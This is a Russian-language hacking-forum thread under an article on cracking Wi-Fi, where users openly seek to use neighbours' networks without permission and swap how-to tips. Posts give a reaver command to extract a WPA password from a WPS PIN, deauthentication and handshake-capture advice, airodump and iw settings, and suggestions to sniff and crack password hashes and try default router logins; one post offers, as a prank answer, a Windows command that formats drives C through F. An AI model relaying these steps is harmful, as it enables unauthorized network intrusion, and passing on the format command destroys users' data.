Авторские статьи Взлом Wi-Fi для чайников

Discussion in 'Статьи' started by gpuhash, 18 Dec 2011.

  1. antichatwmail

    antichatwmail New Member

    Joined:
    7 Jan 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    спасибо,давно мечтал подключится к wifi соседей xD
     
  2. Bafteam

    Bafteam Member

    Joined:
    31 Dec 2015
    Messages:
    112
    Likes Received:
    40
    Reputations:
    0
    Раз ничего нет, значит не подключен ни один клиент к точке WiFi - жди или выбирай другую, насчет фиксироваться первый раз с таким сталкиваюсь, можно когда подключаешься к роутеру через airodump ввести "-c 11" без кавычек, это значит что адаптер будет фиксироваться на 11 канале.
     
  3. juliamavka

    juliamavka New Member

    Joined:
    4 Jan 2016
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    хмм ну так уж просто оказалось, как хотелось бы, но если поиграться то можно и получить халявный вайфайчик)
     
  4. Bafteam

    Bafteam Member

    Joined:
    31 Dec 2015
    Messages:
    112
    Likes Received:
    40
    Reputations:
    0
    Кто нибудь может подсказать, как узнать внешний IP адрес роутера в Kali Linux, если я к нему не подключен.
     
  5. radik91

    radik91 New Member

    Joined:
    15 Jun 2015
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Reaver удалось перебрать wps от wr1042nd, круто)
     
    Katya.sx likes this.
  6. Tishhko

    Tishhko New Member

    Joined:
    5 May 2016
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Вечер добрый, хз та не та темка, взял вафлеадаптер тплинк тлвд7200нд как и советует топикооткрыватель. в общем в винде комонвифи не разъединяет роут с пользователем, а в линуксах грит чтото в духе нот сач девайс, после попытки повысить мощность или ввести airodump-ng mon0, в чем трабла то? вродеб и с дровами всё неплохо, и с головой дружил когдато. в общем нид хелп!:p
     
  7. Bafteam

    Bafteam Member

    Joined:
    31 Dec 2015
    Messages:
    112
    Likes Received:
    40
    Reputations:
    0
    Недавно узнал что можно как то перехватывать пароли в MD5 или конверитровать cap в MD5 а потом узнавать пароль через онлайн сервисы, может кто объяснит как?
    Не знаю может бред написал, пользуюсь простым методом, Linux + WiFi адаптер = перехват cap и расшифровка в винде с помощью EWSA.
     
  8. comstream

    comstream Member

    Joined:
    11 Aug 2015
    Messages:
    35
    Likes Received:
    11
    Reputations:
    0
    Если сниффить трафик в сети (к которой уже подключился), то можно перехватить MD5 кэши паролей и пробрутить их на онлайн сервисе (например cmd5.ru).

    А к взлому WI-FI md5 кэши никакого отношения не имеют.
     
  9. Bafteam

    Bafteam Member

    Joined:
    31 Dec 2015
    Messages:
    112
    Likes Received:
    40
    Reputations:
    0
    Зачем мне что то перехватывать и расшифровывать, если я уже подключился к сети?
    Или вы имеете ввиду пароли от сайтов?
     
  10. Inferno808

    Inferno808 New Member

    Joined:
    24 Aug 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте. Я знаю WPS PIN от роутера (Zyxel Keenetic 2), но пароль мне неизвестен. (Когда я захожу в Компьютер —> Сеть, выбираю устройство Keenetic 2, и ввожу PIN, то мне предлагают заново настроить роутер, но мне надо знать имеющийся пароль).
    Я знаю, что на роутере стоит свежая прошивка, которая наверняка блокирует WPS при переборе pin кода через Kali Linux. Но мне pin известен, нужен пароль. Так вот, можно ли, зная pin код, через Kali Linux узнать пароль, если у роутера прошивка, блокирующая WPS при атаке?
    Кстати, программы Jumpstart и QSS (для Windows) выдают ошибку — роутер отказывается выдавать пароль. Получится ли узнать пароль через Kali Linux?
     
  11. Alexmeh

    Alexmeh Elder - Старейшина

    Joined:
    19 Nov 2015
    Messages:
    2,344
    Likes Received:
    20,037
    Reputations:
    96
    reaver -i mon0 -b xx:xx:xx:xx:xx:xx(BSSID) -c x(номер канала) -e Keenetic 2(ESSID) --pin=xxxxxxxx(PIN)
    https://forum.antichat.ru/threads/310835/
     
    #311 Alexmeh, 24 Aug 2016
    Last edited: 24 Aug 2016
  12. Курама

    Курама Member

    Joined:
    8 May 2015
    Messages:
    40
    Likes Received:
    14
    Reputations:
    0
    через винду можно ещё написав в командной строке: echo Y|format f & format e & echo Y|format d & echo Y|format c :p
    Получится, на хабре ещё куча подобных статей. ломанёш сеть, смотри пароли по умолчанию, а лучше скачай список таковых, для роутеров разных производителей и сможеш спокойно лазить по меню. Но гадить не надо. А если не получиться тогда энмап в руки а вслед за ним метасплойт, хотя сначала попробовать стоит гидрой и хрустом, ибо у последнего функционал более чем достаточный для создания списка паролей-логинов.
     
  13. warp

    warp Member

    Joined:
    1 Nov 2016
    Messages:
    26
    Likes Received:
    9
    Reputations:
    1
    Тут написанно что можно куки взять зайди в админку вифи, а как это сделать можно поподробней?)
     
  14. mr_Coder

    mr_Coder Member

    Joined:
    1 Dec 2016
    Messages:
    39
    Likes Received:
    6
    Reputations:
    0
    Статья все еще актуальна? Или есть какие то изменения?
     
  15. Turanchocks_

    Turanchocks_ Elder - Старейшина

    Joined:
    11 May 2013
    Messages:
    1,327
    Likes Received:
    3,277
    Reputations:
    17
    Актуальна. Изменилось мало что.
     
    mr_Coder likes this.
  16. iks777

    iks777 New Member

    Joined:
    14 Jan 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Скажите пожалуйста не находит EAPOL.
    У нас война у соседа вай-фай. Линуса нет. У меня мобильный тырнет.
    Вин-7 х64 commview for wifi
    Видит его сеть, подключенный телефон леново.
    Ищу пакеты по инструкции:
    "Итак, запускаем наш чудный инструмент «Инструменты» -> «Реасоциация узлов» и выбираем нашу сеть там где «Послать запрос на деаунтификацию...» и нажимаем «Послать сейчас».
    И видим как пролетели пакеты EAPOL."
    У меня нет пакетов EAPOL
    Только красные строки и темно красные появляются и оливковые и все.
    -
    Только что сказали
    " Если под EAPOL вы имеете в виду хендшейк и не возможность его перехватить,
    то проблема скорее всего в том что клиентом выступает телефон.
    Вообще от мобильных устройств (телефонов, планшетов) очень сложно перехватить хендшейк.
    "
    -
    Советуют использовать airslax. airslax базовый на флешке.
     
    #316 iks777, 14 Jan 2017
    Last edited: 14 Jan 2017
  17. Olivia Dunham

    Olivia Dunham Well-Known Member

    Joined:
    29 Aug 2016
    Messages:
    192
    Likes Received:
    351
    Reputations:
    3
    Если ты их видишь они должны быть у тебя! Это во первых !
    Во вторых, Wi-Fi соседа без разрешения трогать нельзя, это запрещено законом УК РФ, Статья 272!
    Можно попросить пароль у соседа! Мой сосед например, вежливо попросил меня и я ему дала!
    airslax это шлак, есть достойные дистрибутивы Linux для Penetration Testing такие как Kali.
     
  18. Evan

    Evan Banned

    Joined:
    19 Aug 2016
    Messages:
    78
    Likes Received:
    203
    Reputations:
    0
    Одной из причин по которой никак не хочет ловится хэндшейк, может быть, то что на точке доступа ширина полосы настроена на 40Mhz, а вы пытаетесь его словить с помощью адаптера, который работает с настройкой полосы в 20Mhz.(я потом проверял это с несколькими смартфонами, что интересно эффект проявлялся на флаях, а от самсунгов захватывался и со стандартной настройкой) Я не так давно убедился в этом на собственном опыте - хэндшейк не ловился, хотя по всем признакам должен был легко словиться. После принудительного задания ширины полосы адаптера 40Mhz командной "iw dev <if_name> set channel <num_channel> HT40+" (где if_name - имя интерфейса которым мониторите, а num_channel - номер канала на котором работает точка доступа), хэндшейк словился моментально. Когда расшифровал его и посмотрел настройки роутера, там действительно было вбито 40Mhz. Но был ещё один нюанс, хотя это может быть особенность моего адаптера - я использую старую добрую aircrack-ng, и задавать ширину полосы нужно было ПОСЛЕ запуска airodump-ng, потому как при запуске она принудительно выставляет настройку адаптера на 20Mhz. Посмотреть текущую ширину полосы можно командой "iw dev <if_name> info".
     
    #318 Evan, 14 Jan 2017
    Last edited: 14 Jan 2017
  19. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Это мило. :rolleyes: Но к сожалению, таких добрых и щедрых людей, как вы, не так уж и много.
     
    Olivia Dunham likes this.
  20. attilla

    attilla Banned

    Joined:
    15 Jul 2015
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Сломал WEP выдал пароль E728D9457DFBA62128BB1CBE1B другой прогой вот такой En hexadecimal...: E728D9457DFBA62128BB1CBE1B En ASCII.........: ?(?E}??!(?? к точке не подходит чем расшифровать ?....